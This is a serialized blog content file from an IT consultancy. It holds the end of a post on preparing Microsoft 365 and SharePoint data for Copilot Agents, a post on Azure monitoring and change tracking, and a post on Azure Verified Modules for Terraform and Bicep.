EXE, ZIP, as well as image, video, and audio formats such as PNG, IMG, MP3, and MP4—are not supported at this time.",[819,8252,7545],{"id":7544},[809,8254,825],{},[809,8256,8257],{},"By following these recommendations, you can ensure that your Copilot Agents have access to well-structured, secure, and high-quality data, maximizing their usefulness and minimizing the risk of accidental data exposure. Investing time in preparing your SharePoint environment sets a strong foundation for successful AI agent deployment and adoption within your organization.",[809,8259,8260],{},"In fact many of our \"Build-an-Agent\" projects starting exactly with that. Not building the agent, but preparing the infrastructure and knowledge that we have a good quality data to use for the AI, because the Agent is only as good as the system beneath it!",{"title":927,"searchDepth":928,"depth":928,"links":8262},[8263,8264,8265,8278,8282,8288,8292,8298],{"id":7619,"depth":928,"text":7620},{"id":7638,"depth":928,"text":7639},{"id":7714,"depth":928,"text":7715,"children":8266},[8267,8268,8269,8270,8272,8273,8274,8275,8276,8277],{"id":7723,"depth":935,"text":7724},{"id":7732,"depth":935,"text":7733},{"id":7745,"depth":935,"text":7746},{"id":7762,"depth":935,"text":8271},"Step 4: Generate a SharePoint Online Baseline Report",{"id":7794,"depth":935,"text":7795},{"id":7803,"depth":935,"text":7804},{"id":7816,"depth":935,"text":7817},{"id":7825,"depth":935,"text":7826},{"id":7842,"depth":935,"text":7843},{"id":7851,"depth":935,"text":7852},{"id":7885,"depth":928,"text":7886,"children":8279},[8280,8281],{"id":7891,"depth":935,"text":7892},{"id":7923,"depth":935,"text":7924},{"id":7951,"depth":928,"text":7952,"children":8283},[8284,8285,8286,8287],{"id":7964,"depth":935,"text":7965},{"id":7985,"depth":935,"text":7986},{"id":7997,"depth":935,"text":7998},{"id":8016,"depth":935,"text":8017},{"id":8039,"depth":928,"text":8040,"children":8289},[8290,8291],{"id":8068,"depth":935,"text":8069},{"id":8133,"depth":935,"text":8134},{"id":8161,"depth":928,"text":8162,"children":8293},[8294,8295,8296,8297],{"id":8170,"depth":935,"text":8171},{"id":8179,"depth":935,"text":8180},{"id":8192,"depth":935,"text":8193},{"id":8224,"depth":935,"text":8225},{"id":7544,"depth":928,"text":7545},{"lang":940,"seoTitle":8300,"titleClass":942,"date":8301,"categories":8302,"blogtitlepic":8303,"socialimg":8304,"customExcerpt":8305,"keywords":8306,"maxContent":511,"fileLimitations":8307,"textImageTeaser":8334,"asideNav":8343,"hreflang":8363,"footer":8366,"scripts":8367,"published":511},"How to Prepare Your M365 Data for Copilot Agents","2025-08-28",[26],"head-microsoft-copilot.jpg","/blog/heads/head-microsoft-copilot.jpg","Before Microsoft 365 Copilot Agents can deliver real value, the foundation must be solid: clean data, proper permissions, and a reliable infrastructure. This guide explains why data quality determines AI success, highlights risks like oversharing and silos, and outlines 10 practical steps to make your M365 environment agent-ready—secure, compliant, and scalable.","Microsoft 365 Copilot, Copilot Agents, M365 data governance, AI readiness, SharePoint data security, M365 infrastructure, oversharing prevention, AI data preparation, Microsoft 365 security, agent-ready M365",[8308,8312,8316,8319,8322,8324,8326,8328,8330,8332],[8309,8310,8311],"File type","SharePoint Online - Limit","Manual Upload - Limit",[8313,8314,8315],".doc","150 MB","100 MB",[8317,8318,8315],".docx","512 MB",[8320,8314,8321],".html","not supported",[8323,8318,8315],".pdf",[8325,8314,8315],".ppt",[8327,8318,8315],".pptx",[8329,8314,8315],".txt",[8331,8314,8315],".xls",[8333,8314,8315],".xlsx",{"image":8335,"cloudinary":511,"alt":7578,"bgColor":8336,"offset":511,"white":511,"list":8337,"left":752,"float":752,"firstColWidth":3077,"secondColWidth":3089,"copyClasses":7584,"headline":8341,"subline":8342,"spacing":7587},"/icons/icon-copilot.svg","#543b9c",[8338],{"ctaText":8339,"ctaHref":8340,"ctaType":917,"external":511},"Secure your spot now – free of charge!","https://events.teams.microsoft.com/event/53a92e2c-9206-488d-9602-831864212207@a53834b7-42bc-46a3-b004-369735c3acf9","Agent-Ready Infrastructure – Your Foundation for Productive Copilot Agents","\u003Cp>AI is only as good as the infrastructure it runs on. If you want to use Copilot Agents seriously in practice, you need more than just licensing and activation. It’s all about structured data, consistent governance, and a well-thought-out architecture that scales—in short: an Agent-Ready Infrastructure.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>Why data quality and information architecture are critical to success\u003C/li> \u003Cli>How to get your Microsoft 365 environment ready for productive agents\u003C/li> \u003Cli>And which levers you need to pull today so your company truly benefits from AI tomorrow\u003C/li> \u003C/ul> ",{"menuItems":8344},[8345,8348,8351,8354,8357,8360],{"href":8346,"text":8347},"#why-your-infrastructure-data-matters","Why Infrastructure Matters",{"href":8349,"text":8350},"#_10-steps-to-improve-your-m365-data-infrastructure-now","10 Steps for M365 Data",{"href":8352,"text":8353},"#understanding-differences-between-agent-platforms","Understanding Agent Platform",{"href":8355,"text":8356},"#rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG vs. SharePoint vs. Upload",{"href":8358,"text":8359},"#microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","M365 Copilot: Security",{"href":8361,"text":8362},"#best-practices-to-prepare-further-sharepoint-online-for-agent-use","SharePoint Best Practices",[8364,8365],{"lang":4,"href":7598},{"lang":1028,"href":7600},{"noMargin":511},{"slick":511},"/posts/2025-08-28-agent-ready-infrastructure-copy",{"title":7613,"description":927},"posts/2025-08-28-agent-ready-infrastructure copy",[149,7607,7608,7609],"mtImI_jfWIVgSZx9xQDANIbuNDcXQWqhGuqE48iELe0",{"id":8374,"title":8375,"author":8376,"body":8377,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":8477,"moment":8478,"navigation":511,"path":8512,"seo":8513,"stem":8514,"tags":8515,"webcast":752,"__hash__":8519},"content_en/posts/2025-08-27-azure-monitor.md","Monitoring That Grows With You – Organic Solutions in Azure",[1306],{"type":806,"value":8378,"toc":8469},[8379,8383,8385,8388,8392,8394,8397,8414,8417,8421,8423,8426,8429,8432,8436,8438,8441,8444,8448,8450,8453,8456,8459,8462,8464,8466],[819,8380,8382],{"id":8381},"monitoring-in-azure","Monitoring in Azure",[809,8384,825],{},[809,8386,8387],{},"Monitoring in the cloud is much more than just collecting metrics. In dynamic Azure environments, it’s about capturing relevant information in a targeted way, visualizing it meaningfully, and responding automatically. The focus is not only on technical aspects, but also on scalability, cost control, and governance.",[819,8389,8391],{"id":8390},"holistic-monitoring-with-azure-more-than-just-metrics","Holistic Monitoring with Azure – More Than Just Metrics",[809,8393,825],{},[809,8395,8396],{},"A modern monitoring concept in Azure includes various components:",[1648,8398,8399,8402,8405,8408,8411],{},[1652,8400,8401],{},"Azure Monitor as the central platform for metrics, logs, and alerts",[1652,8403,8404],{},"Log Analytics for in-depth analysis and correlation",[1652,8406,8407],{},"Application Insights for application monitoring",[1652,8409,8410],{},"Workbooks and dashboards for visualization",[1652,8412,8413],{},"Action Groups and Logic Apps for automated responses",[809,8415,8416],{},"Monitoring becomes especially valuable when it covers not only cloud-native resources but also hybrid scenarios. With Azure Arc, on-premises systems and other clouds can be seamlessly integrated—including logging, alerting, and policy enforcement. This creates a consistent view across the entire infrastructure.",[819,8418,8420],{"id":8419},"keeping-track-of-changes-and-inventory-change-tracking-inventory","Keeping Track of Changes and Inventory – Change Tracking & Inventory",[809,8422,825],{},[809,8424,8425],{},"An often underestimated aspect of monitoring is tracking changes to resources. With Azure Change Tracking, configuration changes to VMs, files, registry entries, and software installations can be automatically recorded and historically analyzed. This is particularly helpful for root cause analysis of incidents or for meeting compliance requirements.",[809,8427,8428],{},"This is complemented by the Inventory function, which provides a complete overview of installed software, running services, and system configurations—for both Azure VMs and on-premises systems integrated via Azure Arc. This creates a central view of the technical state of the environment, which can be seamlessly integrated into existing monitoring and governance structures.",[809,8430,8431],{},"Combined with Log Analytics and automated alerts, Change Tracking becomes a powerful tool for transparent operations, rapid error analysis, and compliant documentation.",[819,8433,8435],{"id":8434},"cost-control-through-targeted-logging","Cost Control Through Targeted Logging",[809,8437,825],{},[809,8439,8440],{},"A common stumbling block in monitoring is cost development due to uncontrolled logging. Azure offers various pricing tiers with Log Analytics, making long-term retention cost-effective. By selecting appropriate retention periods and sampling strategies, costs can be significantly reduced without sacrificing important information.",[809,8442,8443],{},"A structured approach helps to design logging in a targeted and efficient way. Azure Policy plays a key role here: with predefined policies, diagnostic settings can be automatically applied to new resources. This ensures consistency and significantly reduces manual effort.",[819,8445,8447],{"id":8446},"monitoring-in-managed-service","Monitoring in Managed Service",[809,8449,825],{},[809,8451,8452],{},"Effective monitoring starts with a stable and structured foundation. In Azure environments, a landing zone provides the necessary basis to implement governance, security, and operations consistently. This foundation includes not only network infrastructure and identity management, but also a well-thought-out monitoring framework.",[809,8454,8455],{},"Our Azure Foundation demonstrates how this can work: it brings a set of proven alerts, logging configurations, and Azure Policy controls that ensure new resources are automatically configured with the right settings. This creates an environment where transparency and operational security are considered from the outset.",[809,8457,8458],{},"On top of this, app zones can be provided for specific applications. These zones are flexible and can be integrated into existing monitoring with tailored alerts and automated logging. This keeps the environment scalable and allows it to grow with requirements—without losing visibility or standardization.",[809,8460,8461],{},"This structure ensures that monitoring is not only technically sound but also strategically scalable. Standards provide consistency, while modularity allows for individual requirements. A managed service can support you by taking over operations, maintenance, and further development. This creates freedom to focus on what really matters—your core business, product development, or business process optimization.",[819,8463,1632],{"id":1631},[809,8465,825],{},[809,8467,8468],{},"Modern monitoring in Azure is a key building block for stable and secure cloud operations. Those who focus early on standardization, automation, and cost control lay the foundation for transparency, efficiency, and sustainable growth.",{"title":927,"searchDepth":928,"depth":928,"links":8470},[8471,8472,8473,8474,8475,8476],{"id":8381,"depth":928,"text":8382},{"id":8390,"depth":928,"text":8391},{"id":8419,"depth":928,"text":8420},{"id":8434,"depth":928,"text":8435},{"id":8446,"depth":928,"text":8447},{"id":1631,"depth":928,"text":1632},{"lang":940,"seoTitle":8375,"titleClass":942,"date":8478,"categories":8479,"blogtitlepic":8480,"socialimg":8481,"customExcerpt":8482,"keywords":8483,"contactInContent":8484,"hreflang":8505,"footer":8510,"scripts":8511},"2025-08-27",[199],"head-azure-monitor.png","/blog/heads/head-azure-monitor.png","How modern Azure monitoring creates transparency and leaves room for what matters most","Azure Monitor, Microsoft Best Practices, Azure, Azure Foundation",{"quote":752,"infos":8485},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":2029,"subline":8486,"level":819,"textStyling":956,"flush":957,"person":8487,"form":8493},"Would you like to learn more about Azure? We are happy to show you how to work faster, more standardized, and more sustainably in the cloud with Azure Verified Modules. Whether you are just getting started or looking for scalable implementation, we support you with experience and best practices. We look forward to hearing from you!",{"image":8488,"cloudinary":511,"alt":8489,"name":8489,"detailsHeader":964,"details":8490},"/people/people-pam-team.png","Project & Account Management",[8491,8492],{"text":765,"href":1899,"details":2037,"icon":970},{"text":972,"href":973,"icon":974},{"ctaText":976,"cta":8494,"method":938,"action":979,"fields":8495},{"skin":978},[8496,8497,8498,8499,8500,8501,8503,8504],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":2048,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1013,"value":8502},"Form: Blog Azure Verified Modules | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},[8506,8508],{"lang":4,"href":8507},"/de/posts/2025-08-27-azure-monitor",{"lang":1028,"href":8509},"/es/posts/2025-08-27-azure-monitor",{"noMargin":511},{"slick":511},"/posts/2025-08-27-azure-monitor",{"title":8375,"description":927},"posts/2025-08-27-azure-monitor",[8516,8517,8518],"Azure Verified Modules","Terraform","Azure Automation","m-TUA1oU2-hbgebASCylPq60jsWOB4lGrupqDI84JQ0",{"id":8521,"title":8522,"author":8523,"body":8524,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":8688,"moment":8690,"navigation":511,"path":8721,"seo":8722,"stem":8723,"tags":8724,"webcast":752,"__hash__":8726},"content_en/posts/2025-07-22-azure-certified-modules.md","Next Level Azure IaC: Azure Verified Modules",[1271],{"type":806,"value":8525,"toc":8681},[8526,8530,8532,8540,8543,8554,8557,8560,8568,8572,8574,8577,8580,8594,8597,8600,8604,8606,8609,8613,8615,8618,8621,8624,8644,8647,8655,8658,8662],[819,8527,8529],{"id":8528},"azure-verified-modules-iac-according-to-microsoft-best-practices","Azure Verified Modules – IaC According to Microsoft Best Practices",[809,8531,825],{},[809,8533,8534,8535,8539],{},"Microsoft has taken on this challenge and created then ",[813,8536,8538],{"href":8537},"https://azure.github.io/Azure-Verified-Modules","Azure Verified Modules (AVM)",", a framework for structured resource deployment in Azure based on best practices.",[809,8541,8542],{},"AVM comes in three different variants:",[1648,8544,8545,8548,8551],{},[1652,8546,8547],{},"Resource Modules – Deployment of a defined cloud resource",[1652,8549,8550],{},"Pattern Modules – Deployment of a defined cloud workload",[1652,8552,8553],{},"Utility Modules – Helper modules used by Resource or Pattern Modules",[809,8555,8556],{},"To ensure consistency, Microsoft has set out a series of requirements that every new AVM resource must meet. These requirements apply to both Terraform and Microsoft Azure’s own IaC language, Bicep.",[809,8558,8559],{},"Each AVM is assigned to a specific Microsoft employee who is responsible for its creation, ongoing development and handling issues.",[809,8561,8562,8563,8567],{},"All available modules are open source (MIT license) and accessible in public GitHub repositories under the general ",[813,8564,8566],{"href":8565},"https://github.com/Azure","Azure GitHub organization",". If a module causes issues or lacks a required parameter, anyone can file an issue or contribute to its development.",[819,8569,8571],{"id":8570},"how-do-you-get-started-with-avm","How Do You Get Started with AVM?",[809,8573,825],{},[809,8575,8576],{},"AVM works just like any other module in Terraform or Bicep; they are called independently and receive all required parameters. The AVM guidelines ensure that the number of required parameters is minimised to provide an easy entry point.",[809,8578,8579],{},"Example with Terraform:\nTo deploy a virtual machine with an additional data disk, you would typically need at least the following Azure resources:",[1648,8581,8582,8585,8588,8591],{},[1652,8583,8584],{},"azurerm_windows_virtual_machine oder azurerm_linux_virtual_machine",[1652,8586,8587],{},"azurerm_network_interface",[1652,8589,8590],{},"azurerm_managed_disk",[1652,8592,8593],{},"azurerm_virtual_machine_data_disk_attachment\u003C",[809,8595,8596],{},"Each of these resources has mandatory parameters that often repeat, such as the resource group name, target region, or resource naming conventions.",[809,8598,8599],{},"With AVM, this is simplified in your code to a single resource containing the necessary parameters, which are then processed further within the module. AVM incorporates Microsoft's most common best practices, so many parameters have default values, eliminating the need for additional configuration steps. For example, many modules enforce TLS 1.2 as the default setting or block public access by default.",[819,8601,8603],{"id":8602},"what-if-theres-no-avm-for-my-resource-yet","What If There’s No AVM for My Resource Yet?",[809,8605,825],{},[809,8607,8608],{},"Thanks to AVM’s open-source license, you can use the framework to begin your own development. If a Microsoft employee later decides to create an official AVM resource, your prior work can contribute to the open-source effort.",[819,8610,8612],{"id":8611},"gkvm-glueckkanja-️-open-source","GKVM – glueckkanja ❤️ Open Source",[809,8614,825],{},[809,8616,8617],{},"At glueckkanja, we follow exactly this approach and also support our customers in developing modules based on the AVM framework that are later made publicly available.",[809,8619,8620],{},"We call these modules GKVM (GlueckKanja Verified Modules), because they not only follow AVM requirements but also include our own insights from numerous projects.",[809,8622,8623],{},"GKVM Resource Modules:",[1648,8625,8626,8632,8638],{},[1652,8627,8628],{},[813,8629,8631],{"href":8630},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-synapse-workspace/azurerm/latest","Azure Synapse Workspace",[1652,8633,8634],{},[813,8635,8637],{"href":8636},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-iot-hub/azurerm/latest","Azure IoT Hub",[1652,8639,8640],{},[813,8641,8643],{"href":8642},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-messaging-eventgridsystemtopic/azurerm/latest","Azure Event Grid System Topic",[809,8645,8646],{},"GKVM Pattern Modules:",[1648,8648,8649],{},[1652,8650,8651],{},[813,8652,8654],{"href":8653},"https://registry.terraform.io/modules/glueckkanja/gkvm-ptn-myworkid/azurerm/latest","My WorkId",[809,8656,8657],{},"Feel free have a look and provide issues, which will enhance the modules even furthermore!",[819,8659,8661],{"id":8660},"further-resources","Further Resources",[1648,8663,8664,8669,8675],{},[1652,8665,8666],{},[813,8667,8668],{"href":322},"glueckkanja Azure Foundation",[1652,8670,8671],{},[813,8672,8674],{"href":8673},"/en/posts/2023-04-14-workload-management-with-azure-foundation","Azure Foundation: Efficient Cloud Management with Terraform",[1652,8676,8677],{},[813,8678,574],{"href":8679,"rel":8680},"https://www.terraprovider.com/",[1509],{"title":927,"searchDepth":928,"depth":928,"links":8682},[8683,8684,8685,8686,8687],{"id":8528,"depth":928,"text":8529},{"id":8570,"depth":928,"text":8571},{"id":8602,"depth":928,"text":8603},{"id":8611,"depth":928,"text":8612},{"id":8660,"depth":928,"text":8661},{"lang":940,"seoTitle":8689,"titleClass":942,"date":8690,"categories":8691,"blogtitlepic":8692,"socialimg":8693,"customExcerpt":8694,"keywords":8695,"contactInContent":8696,"hreflang":8714,"footer":8719,"scripts":8720},"Azure Verified Modules: Standardized Infrastructure as Code with Terraform & Bicep","2025-07-22",[199],"head-azure-certified.png","/blog/heads/head-azure-certified.png","Infrastructure-as-Code (IaC), especially with Terraform, is a key component of our Azure Foundation and a fundamental element of every cloud transformation. A structured use of IaC accelerates the adoption of cloud services as well as the development of new products. But how do you get started in the best way?","Azure Verified Modules, AVM, Infrastructure as Code, IaC, Terraform, Bicep, Microsoft Best Practices, Azure Module Deployment, Azure Foundation, Open Source Azure, Azure IaC, Azure Automation, automated deployment of Azure resources",{"quote":752,"infos":8697},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":2029,"subline":8698,"level":819,"textStyling":956,"flush":957,"person":8699,"form":8703},"Would you like to learn more about Infrastructure as Code on Azure? We are happy to show you how to work faster, more standardized, and more sustainably in the cloud with Azure Verified Modules. Whether you are just getting started or looking for scalable implementation, we support you with experience and best practices. We look forward to hearing from you!",{"image":8488,"cloudinary":511,"alt":8489,"name":8489,"detailsHeader":964,"details":8700},[8701,8702],{"text":765,"href":1899,"details":2037,"icon":970},{"text":972,"href":973,"icon":974},{"ctaText":976,"cta":8704,"method":938,"action":979,"fields":8705},{"skin":978},[8706,8707,8708,8709,8710,8711,8712,8713],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":2048,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1013,"value":8502},{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},[8715,8717],{"lang":4,"href":8716},"/de/posts/2025-07-22-azure-certified-modules",{"lang":1028,"href":8718},"/es/posts/2025-07-22-azure-certified-modules",{"noMargin":511},{"slick":511},"/posts/2025-07-22-azure-certified-modules",{"title":8522,"description":927},"posts/2025-07-22-azure-certified-modules",[8725,8516,8517,8518],"Infrastructure as Code","g2M43AsGY_wm7NAQAUp2YMGm6LDeE98zrrkf4SK71ww",1785679181796]